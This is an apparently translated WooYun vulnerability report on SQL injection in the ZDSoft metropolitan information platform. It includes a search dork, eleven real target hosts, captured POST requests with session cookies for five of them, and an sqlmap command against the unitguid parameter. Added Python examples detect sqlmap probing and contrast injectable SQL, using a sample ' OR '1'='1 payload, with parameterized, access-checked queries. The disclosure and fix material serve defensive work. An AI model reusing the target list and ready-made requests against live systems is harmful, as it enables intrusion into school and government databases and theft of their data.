
Vulnerability Summary (followers: 24)

Defect ID: wooyun-2014-064113

Title: Generic SQL injection vulnerability in a certain integrated information platform

Related vendor: cncert (National Internet Emergency Center)

Author: sex is not show

Submitted: 2014-06-10 10:23

Fix time: 2014-09-08 10:24

Public disclosure: 2014-09-08 10:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2014-06-10: Details sent to the vendor; awaiting vendor handling
2014-06-14: Vendor confirmed; details disclosed to the vendor only
2014-06-17: Details opened to third-party security partners
2014-08-08: Details disclosed to core white hats and experts in related fields
2014-08-18: Details disclosed to regular white hats
2014-08-28: Details disclosed to intern white hats
2014-09-08: Details disclosed to the public

Brief description:

Finding a vulnerability isn't easy these days..

Detailed description:

Web application: ZDSoft城域综合信息平台 (ZDSoft Metropolitan Area Integrated Information Platform)
Related vendor: 浙大万朋 (presumably them)
Search keyword (google/baidu): intitle:ZDSoft城域综合信息平台
User base:

[screenshot: 1.jpg]


Vulnerable file: cnet/student2/generalquery/archives/archivesfrm.jsp
Vulnerable parameter: unitguid
Root cause: the file performs no permission check and the parameter is not filtered, so injection results
In the case demonstrations below I list the full request packets, because during testing I found that when I just changed the host parameter directly, sqlmap could not identify the injection, which was frustrating. So I captured the packets manually and tested each one; the vulnerability really does exist.
I put together a list of a few sites myself:

http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://222.132.51.26:1949/cnet/student2/generalquery/archives/archivesfrm.jsp
http://220.166.21.94:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://vod.ydxedu.com:81/cnet/student2/generalquery/archives/archivesfrm.jsp
http://www.gyzqjy.com:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://118.122.51.66:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://gm.fsjy.cn:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
http://221.0.93.135/cnet/student2/generalquery/archives/archivesfrm.jsp
http://oa.fsjyj.gov.cn:81/cnet/student2/generalquery/archives/archivesfrm.jsp
http://211.86.89.229:9999/cnet/student2/generalquery/archives/archivesfrm.jsp
http://61.153.240.147:8080/cnet/student2/generalquery/archives/archivesfrm.jsp


Real-case demonstrations below:
1.
http://120.35.4.22:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
POST request packet:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: 120.35.4.22:8080
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=ACD5A7CF820CEE8794775C22B3890E07
Content-Length: 49
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


Run it through sqlmap:
sqlmap -r 1.txt -p unitguid
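From the defender's side, the same request shape the author feeds to sqlmap is what a WAF or proxy log would capture, and it can be screened for probing of this page. The following is an added example, not code from the report or from the platform vendor: it runs two checks over constructed request-log records (the tab-separated format, the IPs and the log lines are all assumptions, as is the rule that a legitimate unitguid is a short alphanumeric token like the Eh4kygaB seen in the captured packets) and flags records whose User-Agent names sqlmap or whose unitguid value falls outside that allowlist.

```python
import re
from urllib.parse import parse_qs

# The endpoint and parameter named in the report.
TARGET_PATH = "/cnet/student2/generalquery/archives/archivesfrm.jsp"
# Assumed legitimate format for unitguid: a short alphanumeric token,
# like the value Eh4kygaB seen in the captured requests.
UNITGUID_RE = re.compile(r"[A-Za-z0-9]{1,32}")

# Constructed sample records (not real logs): a request log that retains
# the form body, as a WAF or reverse proxy might. Fields:
# client_ip, method, path, user_agent, form_body
SAMPLE_RECORDS = [
    ("10.0.0.5", "POST", TARGET_PATH, "Mozilla/5.0 (Windows NT 6.1) Chrome/20.0",
     "idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB"),
    ("10.0.0.9", "POST", TARGET_PATH, "sqlmap/1.0-dev",
     "idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB%27%20AND%201%3D1"),
    ("10.0.0.9", "POST", TARGET_PATH, "Mozilla/5.0",
     "idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB%27%20OR%201%3D1--"),
    ("10.0.0.7", "GET", "/cnet/index.jsp", "Mozilla/5.0", ""),
]
SAMPLE_LOG = "\n".join("\t".join(r) for r in SAMPLE_RECORDS) + "\n"


def parse_line(line: str):
    """Split one tab-separated record; return None for malformed lines."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 5:
        return None
    ip, method, path, ua, body = parts
    return {"ip": ip, "method": method, "path": path, "ua": ua, "body": body}


def inspect(record: dict) -> list:
    """Return the reasons a record looks like probing of the vulnerable page."""
    reasons = []
    if record["path"] != TARGET_PATH:
        return reasons
    # Tool fingerprint: sqlmap identifies itself in User-Agent unless told otherwise.
    if "sqlmap" in record["ua"].lower():
        reasons.append("scanner-user-agent")
    # Parameter shape: decode the body and check unitguid against the allowlist.
    params = parse_qs(record["body"], keep_blank_values=True)
    if any(not UNITGUID_RE.fullmatch(v) for v in params.get("unitguid", [])):
        reasons.append("unitguid-malformed")
    return reasons


def analyze(log_text: str) -> list:
    """Run inspect() over every line and collect the flagged records."""
    findings = []
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        reasons = inspect(rec)
        if reasons:
            findings.append({"ip": rec["ip"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in analyze(SAMPLE_LOG):
        print(hit)
```

The allowlist check is the more durable of the two signals: a User-Agent is trivially changed, but any value of unitguid that is not a plain token is outside what the page should ever receive, regardless of which tool sent it.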

[screenshots: 1.jpg, 1.jpg]


2.
http://222.132.51.26:1949/cnet/student2/generalquery/archives/archivesfrm.jsp
POST request packet:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Content-Length: 87
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://222.132.51.26:1949/
Cookie: JSESSIONID=C356F9EEAEB6140FA64728A791EA031C; guid=2c6de924-08f0-4412-a30d-bc0e0cc42b3b; saveUserName=1; userName=1
Host: 222.132.51.26:1949
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


[screenshots: 1.jpg, 1.jpg]


3.
http://220.166.21.94:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
POST request packet:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: 220.166.21.94:8080
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=198FF1A21178AD03FE7AF73202FBBDFF; JSESSIONID=AF68E0896DA8B438D40D22684CE3B392
Content-Length: 49
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


[screenshots: 1.jpg, 1.jpg]


4.
http://vod.ydxedu.com:81/cnet/student2/generalquery/archives/archivesfrm.jsp
POST request packet:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: vod.ydxedu.com:81
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


[screenshots: 1.jpg, 1.jpg]


5.
http://www.gyzqjy.com:8080/cnet/student2/generalquery/archives/archivesfrm.jsp
POST request packet:

POST /cnet/student2/generalquery/archives/archivesfrm.jsp HTTP/1.1
Host: www.gyzqjy.com:8080
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ret43ixmwzp1bcpd50kfh5mt
idTree=&infoid=&modid=&modname=&unitguid=Eh4kygaB


[screenshots: 1.jpg, 1.jpg]

Proof of vulnerability:

See the detailed description.

Fix recommendation:

Filter the parameter, and add access control to the file.
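The root cause given in the detailed description (no permission check on the page, unfiltered unitguid) and the fix recommended here are two separate defects, and the following added example models both side by side. It is not code from the report or from the ZDSoft platform, which is a JSP application whose source is not on the page: Python with SQLite stands in for the JSP/JDBC lookup, the archives table, its rows and the session dictionary are constructed, and the allowlist that treats unitguid as a short alphanumeric token (like the Eh4kygaB value in the captured packets) is an assumption about the legitimate format.

```python
import re
import sqlite3

# Constructed sample data standing in for the platform's archives table
# (the real schema is not on the page; these names are assumptions).
SAMPLE_ROWS = [
    ("Eh4kygaB", "Unit A", "archive-a"),
    ("Xk92pLqz", "Unit B", "archive-b"),
    ("Qq11mmNN", "Unit C", "archive-c"),
]

# Allowlist for the unitguid parameter; the observed value is 8 alphanumerics,
# so a short alphanumeric token is assumed to be the legitimate format.
UNITGUID_RE = re.compile(r"[A-Za-z0-9]{1,32}")


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database holding the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE archives (unitguid TEXT, unitname TEXT, archive TEXT)")
    conn.executemany("INSERT INTO archives VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def query_vulnerable(conn: sqlite3.Connection, unitguid: str) -> list:
    """Models the reported defect: no caller check, and unitguid is spliced
    into the SQL text, so a quote in the value rewrites the query's logic."""
    sql = (
        "SELECT unitguid, unitname, archive FROM archives "
        "WHERE unitguid = '%s'" % unitguid
    )
    return conn.execute(sql).fetchall()


def query_bound_only(conn: sqlite3.Connection, unitguid: str) -> list:
    """Parameter binding alone: the value travels to the driver separately
    and is never parsed as SQL, so an injected quote simply matches nothing."""
    return conn.execute(
        "SELECT unitguid, unitname, archive FROM archives WHERE unitguid = ?",
        (unitguid,),
    ).fetchall()


def query_fixed(conn: sqlite3.Connection, session: dict, unitguid: str) -> list:
    """The two fixes the report recommends, applied together with a
    parameterized query: an access check on the page and parameter filtering."""
    # 1. Access control: the page must only answer authenticated users.
    if not session.get("authenticated"):
        raise PermissionError("login required")
    # 2. Input validation: reject anything outside the expected token format.
    if not UNITGUID_RE.fullmatch(unitguid):
        raise ValueError("invalid unitguid: %r" % unitguid)
    # 3. Parameterized query: the value is bound, never concatenated.
    return query_bound_only(conn, unitguid)


if __name__ == "__main__":
    db = make_db()
    payload = "' OR '1'='1"
    print("vulnerable, normal value:", query_vulnerable(db, "Eh4kygaB"))
    print("vulnerable, injected    :", query_vulnerable(db, payload))
    print("bound only, injected    :", query_bound_only(db, payload))
    print("fixed, normal value     :", query_fixed(db, {"authenticated": True}, "Eh4kygaB"))
```

Binding the parameter is what actually removes the injection; the allowlist is defence in depth that also makes malformed requests visible in logs, and the session check closes the separate problem that the page answered anyone at all.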

Copyright notice: please credit the source when reposting: sex is not show@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 16

Confirmed: 2014-06-14 22:40

Vendor reply:

CNVD confirmed and reproduced the multiple instances described, and has notified the software vendor 浙大万朋 via CNVD, phone: 8717 8314 (Engineer Zheng), sending the notification for handling. At the same time, based on the test instances, the cases were forwarded to CNCERT to be issued to the Fujian, Sichuan, Shandong and Zhejiang branch centers for handling.

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2014-06-10 10:25 | Mr.leo ( Regular white hat | Rank:1314 Vulns:176 | What should I say!!)

    Stopping by to mark this in the middle of a busy day

  2. 2014-06-10 10:34 | sex is not show Verified white hat ( Regular white hat | Rank:1495 Vulns:233 | This guy is so lazy!)

    @Mr.leo They're all small vendors, frustrating

  3. 2014-06-10 11:53 | U神 ( Core white hat | Rank:1285 Vulns:142 | Thanks WooYun, I won't forget the kindness; actually I've always been quietly on WooYun...)

    @sex is not show For the government-affairs ones it might be a big vendor